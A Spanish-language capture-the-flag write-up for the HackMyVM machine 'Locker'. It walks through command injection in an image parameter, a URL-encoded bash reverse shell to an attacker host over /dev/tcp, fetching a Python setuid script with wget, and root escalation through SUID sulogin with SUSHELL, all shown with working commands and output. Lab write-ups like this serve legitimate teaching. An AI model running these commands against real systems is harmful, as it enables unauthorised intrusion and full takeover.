cd ~/blog

~/writeups/hmv/086-locker.md

086 - Locker

easy Linux hmv 27-04-2024
Command Injection (image parameter)SUID sulogin SUSHELL Privesc
hackmyvm.eu/machines/machine.php?vm=Locker

~1 min de lectura


Enumeramos puertos:

 sudo nmap -p- -sS -n -Pn -oG 01-allPorts 192.168.1.140
 nmap -sCV -p80 -oN 02-targeted.txt 192.168.1.140
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-27 15:24 -04
Nmap scan report for 192.168.1.140
Host is up (0.00034s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.42 seconds

El sitio carga imágenes mediante un parámetro, vulnerable a inyección de comandos:

http://192.168.1.140/locker.php?image=1
 curl 'http://192.168.1.140/locker.php?image=;id;'
<img src="data:image/jpg;base64,uid=33(www-data) gid=33(www-data) groups=33(www-data)
"width="150"height="150"/>

Lanzamos una reverse shell (URL-encoded):

 curl 'http://192.168.1.140/locker.php?image=;bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/192.168.1.3/1234%200%3E%261%22;'

 ncat -nlvp 1234
Ncat: Version 7.94 ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.1.140:33684.
bash: cannot set terminal process group (369): Inappropriate ioctl for device
bash: no job control in this shell
www-data@locker:~/html$

Para escalar, buscamos binarios SUID y encontramos sulogin:

www-data@locker:~$ find / -perm -4000 2>/dev/null
...
/usr/sbin/sulogin
...

sulogin ejecuta el shell indicado por la variable de entorno SUSHELL. Creamos un script en Python que invoca setuid(0) y lanza bash:

 cat pwned.py
#!/usr/bin/python3
import os

def main():
    os.setuid(0)
    os.setgid(0)
    os.system("/bin/bash")

if __name__ == "__main__":
    main()

Lo transferimos, apuntamos SUSHELL a él y ejecutamos sulogin:

www-data@locker:/tmp$ wget http://192.168.1.3:8000/pwned.py
www-data@locker:/tmp$ chmod +x pwned.py

www-data@locker:/tmp$ export SUSHELL=/tmp/pwned.py
www-data@locker:/tmp$ sulogin -e
sulogin -e
Press Enter for maintenance
(or press Control-D to continue):

root@locker:~#

Obtenemos nuestra flag.

Fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados